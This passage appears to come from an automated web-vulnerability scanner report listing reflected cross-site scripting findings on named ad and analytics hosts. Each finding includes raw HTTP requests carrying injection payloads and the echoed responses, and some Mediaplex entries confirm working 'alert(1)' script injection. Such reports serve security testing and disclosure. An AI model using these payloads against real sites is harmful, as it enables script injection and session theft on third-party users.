Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1340562691-1296313949532; __utmz=14861494.1296918985.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/50; __utmz=27727020.1297458290.3.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/10; __utma=27727020.780724242.1297445179.1297458290.1297473023.4; qcVisitor=2|97|1297445121784|21|NOTSET; __utma=14861494.2106100296.1296313950.1297539959.1297559505.10

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Date: Mon, 14 Feb 2011 01:15:29 GMT
Connection: close
Content-Length: 7819


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html>


<head>

<meta http-equiv="Content-Type" content="text/html; cha
...[SNIP]...
<em> dynamic-cssbbcb7<a>9b344e13caa screen-optimized.css</em>
...[SNIP]...

3.78. http://ak.quantcast.com/dynamic-css/screen-optimized.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://ak.quantcast.com
Path:   /dynamic-css/screen-optimized.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2e52f"><a>342afe3b0a5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /dynamic-css2e52f"><a>342afe3b0a5/screen-optimized.css?v=2011021301 HTTP/1.1
Host: ak.quantcast.com
Proxy-Connection: keep-alive
Referer: http://www.quantcast.com/top-sites-1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1340562691-1296313949532; __utmz=14861494.1296918985.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/50; __utmz=27727020.1297458290.3.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/10; __utma=27727020.780724242.1297445179.1297458290.1297473023.4; qcVisitor=2|97|1297445121784|21|NOTSET; __utma=14861494.2106100296.1296313950.1297539959.1297559505.10

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Date: Mon, 14 Feb 2011 01:15:27 GMT
Connection: close
Content-Length: 7825


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html>


<head>

<meta http-equiv="Content-Type" content="text/html; cha
...[SNIP]...
<input type="text" id="query" class="search-main placeholder" name="q" autocomplete="off" value=" dynamic-css2e52f"><a>342afe3b0a5 screen-optimized.css" />
...[SNIP]...

3.79. http://ak.quantcast.com/dynamic-css/screen-optimized.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://ak.quantcast.com
Path:   /dynamic-css/screen-optimized.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 598a7"><a>e5dcf033114 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /dynamic-css/screen-optimized.css598a7"><a>e5dcf033114?v=2011021301 HTTP/1.1
Host: ak.quantcast.com
Proxy-Connection: keep-alive
Referer: http://www.quantcast.com/top-sites-1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1340562691-1296313949532; __utmz=14861494.1296918985.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/50; __utmz=27727020.1297458290.3.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/10; __utma=27727020.780724242.1297445179.1297458290.1297473023.4; qcVisitor=2|97|1297445121784|21|NOTSET; __utma=14861494.2106100296.1296313950.1297539959.1297559505.10

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Date: Mon, 14 Feb 2011 01:15:33 GMT
Connection: close
Content-Length: 7825


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html>


<head>

<meta http-equiv="Content-Type" content="text/html; cha
...[SNIP]...
<input type="text" id="query" class="search-main placeholder" name="q" autocomplete="off" value=" dynamic-css screen-optimized.css598a7"><a>e5dcf033114" />
...[SNIP]...

3.80. http://ak.quantcast.com/dynamic-css/screen-optimized.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://ak.quantcast.com
Path:   /dynamic-css/screen-optimized.css

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a9d1d<a>18beb38da81 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /dynamic-css/screen-optimized.cssa9d1d<a>18beb38da81?v=2011021301 HTTP/1.1
Host: ak.quantcast.com
Proxy-Connection: keep-alive
Referer: http://www.quantcast.com/top-sites-1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1340562691-1296313949532; __utmz=14861494.1296918985.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/50; __utmz=27727020.1297458290.3.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/10; __utma=27727020.780724242.1297445179.1297458290.1297473023.4; qcVisitor=2|97|1297445121784|21|NOTSET; __utma=14861494.2106100296.1296313950.1297539959.1297559505.10

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Date: Mon, 14 Feb 2011 01:15:34 GMT
Connection: close
Content-Length: 7819


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html>


<head>

<meta http-equiv="Content-Type" content="text/html; cha
...[SNIP]...
<em> dynamic-css screen-optimized.cssa9d1d<a>18beb38da81</em>
...[SNIP]...

3.81. http://ak.quantcast.com/js/concat.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://ak.quantcast.com
Path:   /js/concat.js

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c1640<a>fe40a244aa7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /jsc1640<a>fe40a244aa7/concat.js?v=2011021301 HTTP/1.1
Host: ak.quantcast.com
Proxy-Connection: keep-alive
Referer: http://www.quantcast.com/top-sites-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1340562691-1296313949532; __utmz=14861494.1296918985.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/50; __utmz=27727020.1297458290.3.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/10; __utma=27727020.780724242.1297445179.1297458290.1297473023.4; qcVisitor=2|97|1297445121784|21|NOTSET; __utma=14861494.2106100296.1296313950.1297539959.1297559505.10

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Date: Mon, 14 Feb 2011 01:15:31 GMT
Connection: close
Content-Length: 7759


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html>


<head>

<meta http-equiv="Content-Type" content="text/html; cha
...[SNIP]...
<em> jsc1640<a>fe40a244aa7 concat.js</em>
...[SNIP]...

3.82. http://ak.quantcast.com/js/concat.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://ak.quantcast.com
Path:   /js/concat.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload efbfc"><a>55ce9d351 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /jsefbfc"><a>55ce9d351/concat.js?v=2011021301 HTTP/1.1
Host: ak.quantcast.com
Proxy-Connection: keep-alive
Referer: http://www.quantcast.com/top-sites-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1340562691-1296313949532; __utmz=14861494.1296918985.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/50; __utmz=27727020.1297458290.3.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/10; __utma=27727020.780724242.1297445179.1297458290.1297473023.4; qcVisitor=2|97|1297445121784|21|NOTSET; __utma=14861494.2106100296.1296313950.1297539959.1297559505.10

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Date: Mon, 14 Feb 2011 01:15:30 GMT
Connection: close
Content-Length: 7759


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html>


<head>

<meta http-equiv="Content-Type" content="text/html; cha
...[SNIP]...
<input type="text" id="query" class="search-main placeholder" name="q" autocomplete="off" value=" jsefbfc"><a>55ce9d351 concat.js" />
...[SNIP]...

3.83. http://ak.quantcast.com/js/concat.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://ak.quantcast.com
Path:   /js/concat.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 813a5"><a>65679342fd3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /js/concat.js813a5"><a>65679342fd3?v=2011021301 HTTP/1.1
Host: ak.quantcast.com
Proxy-Connection: keep-alive
Referer: http://www.quantcast.com/top-sites-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1340562691-1296313949532; __utmz=14861494.1296918985.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/50; __utmz=27727020.1297458290.3.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/10; __utma=27727020.780724242.1297445179.1297458290.1297473023.4; qcVisitor=2|97|1297445121784|21|NOTSET; __utma=14861494.2106100296.1296313950.1297539959.1297559505.10

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Date: Mon, 14 Feb 2011 01:15:35 GMT
Connection: close
Content-Length: 15255


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html>


<head>

<meta http-equiv="Content-Type" content="text/html; cha
...[SNIP]...
<input type="text" id="query" class="search-main placeholder" name="q" autocomplete="off" value=" js concat.js813a5"><a>65679342fd3" />
...[SNIP]...

3.84. http://ak.quantcast.com/wp-content/themes/quantcast/css/not_ie.min.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://ak.quantcast.com
Path:   /wp-content/themes/quantcast/css/not_ie.min.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5f76"><a>3fa69ed0a65 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /e5f76"><a>3fa69ed0a65/themes/quantcast/css/not_ie.min.css HTTP/1.1
Host: ak.quantcast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=27727020.1297458290.3.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/10; __utma=14861494.2106100296.1296313950.1297539959.1297559505.10; __qca=P0-1340562691-1296313949532; qcVisitor=2|97|1297445121784|21|NOTSET;

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en
Date: Mon, 14 Feb 2011 01:22:25 GMT
Content-Length: 17569
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html>


<head>

<meta http-equiv="Content-Type" content="text/html; cha
...[SNIP]...
<input type="text" id="query" class="search-main placeholder" name="q" autocomplete="off" value=" e5f76"><a>3fa69ed0a65 themes quantcast css not_ie.min.css" />
...[SNIP]...

3.85. http://ak.quantcast.com/wp-content/themes/quantcast/css/print.min.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://ak.quantcast.com
Path:   /wp-content/themes/quantcast/css/print.min.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a5978"><a>377769c7bcc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /a5978"><a>377769c7bcc/themes/quantcast/css/print.min.css HTTP/1.1
Host: ak.quantcast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=27727020.1297458290.3.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/10; __utma=14861494.2106100296.1296313950.1297539959.1297559505.10; __qca=P0-1340562691-1296313949532; qcVisitor=2|97|1297445121784|21|NOTSET;

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en
Date: Mon, 14 Feb 2011 01:22:24 GMT
Content-Length: 17563
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html>


<head>

<meta http-equiv="Content-Type" content="text/html; cha
...[SNIP]...
<input type="text" id="query" class="search-main placeholder" name="q" autocomplete="off" value=" a5978"><a>377769c7bcc themes quantcast css print.min.css" />
...[SNIP]...

3.86. http://ak.quantcast.com/wp-content/themes/quantcast/css/style.min.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://ak.quantcast.com
Path:   /wp-content/themes/quantcast/css/style.min.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 37ef9"><a>ae77fb278cd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /37ef9"><a>ae77fb278cd/themes/quantcast/css/style.min.css HTTP/1.1
Host: ak.quantcast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=27727020.1297458290.3.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/10; __utma=14861494.2106100296.1296313950.1297539959.1297559505.10; __qca=P0-1340562691-1296313949532; qcVisitor=2|97|1297445121784|21|NOTSET;

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en
Date: Mon, 14 Feb 2011 01:22:34 GMT
Content-Length: 17563
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html>


<head>

<meta http-equiv="Content-Type" content="text/html; cha
...[SNIP]...
<input type="text" id="query" class="search-main placeholder" name="q" autocomplete="off" value=" 37ef9"><a>ae77fb278cd themes quantcast css style.min.css" />
...[SNIP]...

3.87. http://ak.quantcast.com/wp-content/themes/quantcast/js/jquery.jstree.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://ak.quantcast.com
Path:   /wp-content/themes/quantcast/js/jquery.jstree.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d549"><a>aa46721e34 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /6d549"><a>aa46721e34/themes/quantcast/js/jquery.jstree.js HTTP/1.1
Host: ak.quantcast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=27727020.1297458290.3.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/10; __utma=14861494.2106100296.1296313950.1297539959.1297559505.10; __qca=P0-1340562691-1296313949532; qcVisitor=2|97|1297445121784|21|NOTSET;

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en
Date: Mon, 14 Feb 2011 01:22:40 GMT
Content-Length: 18092
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html>


<head>

<meta http-equiv="Content-Type" content="text/html; cha
...[SNIP]...
<input type="text" id="query" class="search-main placeholder" name="q" autocomplete="off" value=" 6d549"><a>aa46721e34 themes quantcast js jquery.jstree.js" />
...[SNIP]...

3.88. http://ak.quantcast.com/wp-content/themes/quantcast/js/minified.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://ak.quantcast.com
Path:   /wp-content/themes/quantcast/js/minified.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e8cba"><a>d0995bb00a4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /e8cba"><a>d0995bb00a4/themes/quantcast/js/minified.js HTTP/1.1
Host: ak.quantcast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=27727020.1297458290.3.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/10; __utma=14861494.2106100296.1296313950.1297539959.1297559505.10; __qca=P0-1340562691-1296313949532; qcVisitor=2|97|1297445121784|21|NOTSET;

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en
Date: Mon, 14 Feb 2011 01:22:32 GMT
Content-Length: 18068
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html>


<head>

<meta http-equiv="Content-Type" content="text/html; cha
...[SNIP]...
<input type="text" id="query" class="search-main placeholder" name="q" autocomplete="off" value=" e8cba"><a>d0995bb00a4 themes quantcast js minified.js" />
...[SNIP]...

3.89. http://altfarm.mediaplex.com/ad/js/13966-88527-2151-4 [mpt parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /ad/js/13966-88527-2151-4

Issue detail

The value of the mpt request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3685f'-alert(1)-'4d88b1eaae was submitted in the mpt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ad/js/13966-88527-2151-4?mpt=21704443685f'-alert(1)-'4d88b1eaae&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3aae/3/0/%2a/a%3B234423004%3B0-0%3B1%3B20580498%3B4307-300/250%3B40033801/40051588/1%3B%3B%7Eokv%3D%3Bad%3Dbb%3Bsz%3D300x250%3Bpos%3Dinline_bb%3Bpoe%3Dyes%3Borbit%3Dy%3Bdel%3Diframe%3Bfromrss%3Dn%3Brss%3Dn%3Bheavy%3Dy%3Bpage%3Darticle%3B%7Eaopt%3D6/0/ff/0%3B%7Esscs%3D%3f HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.washingtonpost.com/wp-dyn/content/article/2011/02/13/AR2011021301463.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=517004695355; mojo2=10105:2060/12109:6166; mojo3=13966:2151/14302:28901/10105:2060/1551:16084/17339:3601/4608:12284/16228:10420/15017:34880/9609:2042/11606:17922/11293:3113

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: 0
Content-Type: text/html
Content-Length: 462
Date: Mon, 14 Feb 2011 01:38:23 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3aae/3/0/*/a;234423004;0-0;1;20580498;4307-300/250;40033801/40051588/1;;~okv=;ad=bb;sz=300x250;pos=inline_bb;poe=yes;orbit=y;del=iframe;fromrss=n;rss=n;heavy=y;page=article;~aopt=6/0/ff/0;~sscs=?http://altfarm.mediaplex.com/ad/ck/13966-88527-2151-4?mpt=21704443685f'-alert(1)-'4d88b1eaae">
...[SNIP]...

3.90. http://altfarm.mediaplex.com/ad/js/13966-88527-2151-4 [mpvc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /ad/js/13966-88527-2151-4

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 707c4'%3balert(1)//6d6a9985586 was submitted in the mpvc parameter. This input was echoed as 707c4';alert(1)//6d6a9985586 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ad/js/13966-88527-2151-4?mpt=2170444&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3aae/3/0/%2a/a%3B234423004%3B0-0%3B1%3B20580498%3B4307-300/250%3B40033801/40051588/1%3B%3B%7Eokv%3D%3Bad%3Dbb%3Bsz%3D300x250%3Bpos%3Dinline_bb%3Bpoe%3Dyes%3Borbit%3Dy%3Bdel%3Diframe%3Bfromrss%3Dn%3Brss%3Dn%3Bheavy%3Dy%3Bpage%3Darticle%3B%7Eaopt%3D6/0/ff/0%3B%7Esscs%3D%3f707c4'%3balert(1)//6d6a9985586 HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.washingtonpost.com/wp-dyn/content/article/2011/02/13/AR2011021301463.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=517004695355; mojo2=10105:2060/12109:6166; mojo3=13966:2151/14302:28901/10105:2060/1551:16084/17339:3601/4608:12284/16228:10420/15017:34880/9609:2042/11606:17922/11293:3113

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: 0
Content-Type: text/html
Content-Length: 463
Date: Mon, 14 Feb 2011 01:38:26 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3aae/3/0/*/a;234423004;0-0;1;20580498;4307-300/250;40033801/40051588/1;;~okv=;ad=bb;sz=300x250;pos=inline_bb;poe=yes;orbit=y;del=iframe;fromrss=n;rss=n;heavy=y;page=article;~aopt=6/0/ff/0;~sscs=?707c4';alert(1)//6d6a9985586http://altfarm.mediaplex.com/ad/ck/13966-88527-2151-4?mpt=2170444">
...[SNIP]...

3.91. http://altfarm.mediaplex.com/ad/js/13966-88527-2151-4 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /ad/js/13966-88527-2151-4

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 58cba'%3balert(1)//d36ec453a8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 58cba';alert(1)//d36ec453a8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ad/js/13966-88527-2151-4?mpt=2170444&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3aae/3/0/%2a/a%3B234423004%3B0-0%3B1%3B20580498%3B4307-300/250%3B40033801/40051588/1%3B%3B%7Eokv%3D%3Bad%3Dbb%3Bsz%3D300x250%3Bpos%3Dinline_bb%3Bpoe%3Dyes%3Borbit%3Dy%3Bdel%3Diframe%3Bfromrss%3Dn%3Brss%3Dn%3Bheavy%3Dy%3Bpage%3Darticle%3B%7Eaopt%3D6/0/ff/0%3B%7Esscs%3D%3f&58cba'%3balert(1)//d36ec453a8=1 HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
